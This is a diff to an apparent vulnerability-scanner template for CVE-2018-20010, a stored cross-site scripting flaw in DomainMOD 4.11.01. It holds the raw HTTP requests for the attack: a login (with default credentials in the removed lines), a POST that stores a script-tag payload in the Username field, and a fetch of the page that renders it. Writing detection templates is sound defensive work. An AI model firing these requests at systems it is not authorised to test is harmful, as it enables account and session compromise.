diff --git a/cves/2018/CVE-2018-20010.yaml b/cves/2018/CVE-2018-20010.yaml
index f9d03bf147..453fdd8b51 100644
--- a/cves/2018/CVE-2018-20010.yaml
+++ b/cves/2018/CVE-2018-20010.yaml
@@ -1,60 +1,47 @@
-id: CVE-2018-200010
+id: CVE-2018-20010
info:
- name: DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-20010
- https://www.exploit-db.com/exploits/46373/
-
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20010
metadata:
verified: true
- tags: wbcecms,xss
+ tags: cve,cve2018,domainmod,xss
requests:
- raw:
-
- # - |
- # GET /domain/ HTTP/1.1
- # Host: {{Hostname}}
- # Content-Type: application/x-www-form-urlencoded
-
- |
- POST /domain/ HTTP/1.1
+ POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
-
- new_username=admin&new_password=admin123
+
+ new_username={{username}}&new_password={{password}}
- |
- POST /domain/assets/add/ssl-provider-account.php HTTP/1.1
- Host: {{Hostname}}
+ POST /assets/add/ssl-provider-account.php HTTP/1.1
+ Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- Origin: https://{{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=
+ new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=
- |
- GET domain/assets/ssl-accounts.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
+ GET /assets/ssl-accounts.php HTTP/1.1
+ Host: {{Hostname}}
-
- cookie-reuse: true
- matchers-condition: and
+ cookie-reuse: true
redirects: true
- max-redirects: 3
+ max-redirects: 2
+ matchers-condition: and
matchers:
- type: word
part: body
words:
- - ""
+ - '">'
- type: word
part: header
@@ -63,4 +50,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200